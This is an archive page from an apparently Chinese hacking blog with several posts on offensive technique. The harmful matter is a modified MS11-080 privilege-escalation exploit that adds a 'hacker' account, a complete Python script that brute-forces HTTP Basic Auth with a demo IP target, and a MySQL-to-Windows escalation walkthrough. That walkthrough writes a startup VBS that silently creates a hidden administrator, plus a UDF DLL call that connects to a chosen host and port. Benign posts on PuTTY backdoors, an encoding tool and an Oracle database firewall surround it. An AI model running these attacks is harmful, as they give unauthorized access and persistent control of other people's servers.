存档

‘本站原创’ 分类的存档

中文版Putty 后门分析

2012年1月31日 4 条评论

作者:不走的钟

  今天IT行业微博热点 中文Putty多款软件存在后门,有的说被绑马,有后门众说纷纷。简单地说软件后门可以分为二种:

  一、正常软件与木马进行捆绑,当用户运行软件时,木马或者病毒自动运行,用户不知不觉便中了招。

  二、在软件代码中加入了特殊代码,让软件有“特别”的功能,如发送口令到指定服务器,完成木马功能。

阅读全文…

MS11080本地提权添加管理员EXP

2012年1月6日 13 条评论

        MS11080漏洞利用程序,源码来自国外,公开的exp是显示一个system权限的shell,不能带参数直接运行,按一个朋友需求改成可自定义cmd内容,使用方法如下:

XP  :   exp.exe XP “net user hacker /add”
2003:  exp.exe 2K3 “net user hacker /add”

非C,所以体积非常大,仅供学习参考!测试示意图如下:

点击下载

目录Authorization破解工具

2011年12月20日 3 条评论

Web目录下有一些文件不允许匿名访问(可以使用Tomcat、Apache、nginx等进行配制,来实现此效果),如下图:

可以使用以下代码+字典破解,运行结果如下:

主要代码如下(附件中有完整代码,仅供学习!请勿非法使用!):

#!/usr/bin/env python
#coding=utf-8
import sys
import os
import httplib2
import base64

def To_Base64(s):
    s=unicode(s)
    s=s.encode("utf-8")
    encoded = base64.b64encode(s)
    return encoded
def From_Base64(s):
    s=unicode(s)
    decoded = base64.b64decode(s)
    decoded=decoded.decode("utf-8")
    return decoded
def httpRequest(method,url,user_pass):
    if method=='get':
       h= httplib2.Http()
       res, content = h.request(url, 'GET',headers={'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1',
       'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
       'Accept-Language' : 'zh-cn,zh;q=0.5',
       'Accept-Encoding':'gzip, deflate',
       'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7',
       'Proxy-Connection':'keep-alive',
       'Authorization':'Basic '+user_pass})
       startus=res.status
    elif method=='post':
        startus=''
#    print startus
    return startus
################  main  #####################
print '####################################################'
print ' # '+'www.007hack.com'+'  '
print ' # '+'author:admin#007hack.com'+'  '
print ' # '+'Please input a URL'+'  '
print ' # '+'Demo url: http://222.230.17.123'+' '
print ' # '+'Username :user.txt '+'  '
print ' # '+'Password :pass.txt '+'  '
print '#####################################################'

url=raw_input('Please input a url: ')
#url='http://222.230.17.123'

username=open('user.txt','r')
i=0
for username in username.readlines():
    if username!='':
        username="".join(username)
        if username[-1]=='\n':
            username=username[0:-1]
        userpass=open('pass.txt', 'r')
        for userpass in userpass.readlines():
            userpass="".join(userpass)
            if userpass[-1]=='\n':
                userpass=userpass[0:-1]
            user_pass=To_Base64(username+':'+userpass)
            startus=httpRequest('get', str(url), user_pass)
            if startus==200:
                print '####################################################'
                print '                     succeed:'+From_Base64(user_pass)
                print '####################################################'
                exit()
            else:
                i=i+1
                print str(i)+" "+username+':'+userpass

点击下载

007编码转换小工具

2011年11月17日 没有评论

        最近,多次遇到不同编码下的HEX和URLEncode,于是模仿别人界面写了一个小工具,方便编码转换,可以灵活选择编码GBK或者UTF-8,使用习惯后,你会觉得非常方便,如下图所示:

下载地址:点击下载

甲骨文DBA圆桌交流会 — 数据库防火墙

2011年5月27日 没有评论

作者:小蔡一碟

  昨天参加了oracle新产品oracle database firewall的交流会,这款数据库安全产品在国外已有部分客户案例,而此次的交流会应该是oracle在中国推广该款产品的开始。

  简要介绍一下交流会所了解的一些oracle db firewall的信息。

先看下oracle database firewall的一些基本组件:

1.database firewall用于监测数据库的网络及本地流量,可以采用HA架构进行布署;

2.database firewall management server用于集中管理多台database firewall,汇总日志;

3.policy analyzer可用于汇总db firewall或者是db firewall management server的日志并生成相应的policy;

4.remote/local monitor可用来监测本地的,非网络的数据访问。

关 于oracle db firewall的布署,可采用内联,旁路或者是HA等方式,各组件之间,包括与第三方安全产品可以很好的联动,具备智能的sql语句分析引擎,能够生成 符合相关行业的各种报表,支持包括oracle,sql server,db2等多个数据库产品,从今天的交流来看,大家比较关心firewall内联之后的性能问题,这方面oracle也有一套根据tps的指 导方案。

目前,国内似乎还没有类似基于数据库应用的防火墙产品,凭借先进的技术与公司自身的业务能力,oracle db firewall在中国应该会有不错的市场份额。

windows 2008 mysql 提权

2010年5月17日 1 条评论

作者:不走的钟
来源:http://www.007hack.com/?p=567
         mysql 5.1版本以上,必须把udf文件放到mysql安装目录下的lib/plugin下才能创建自定义函数,mysql into dumpfile并不能创建文件夹,所以mysql 5.1以上的版本,root权限提权就很困难了,目前已有的方法只有写启动项如下:

create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user 007hack.com qwer1234!@#$qwe /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 007hack.com /add"",0) " );

 

windows 2008启动项:

C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs
select * from a into outfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs";

 

写启动项缺陷:
1、需要服务器重启(如果管理员3389远程桌面登陆时注销了用户,再次3389连接时,这个脚本就会运行,添加一个管理员,不需要重启)。
2、安全软件可能会拦截。

 

补充:
如果mysql小于5.1是root权限,windows 2008一样可以拿到系统权限(mysql无降权处理)
1、mysql导出一个dll

SELECT udf FROM 007hack_tab INTO DUMPFILE 'c:/007hack.dll

//udf内容网上早有公开

2、创建一个函数

create function myconnect returns integer soname 'c:\\007hack.dll

//c盘要可以写,注意是”\\”

3、调用这个函数

select myconnect('".$chost."','".$cport."')

//这只是一个例子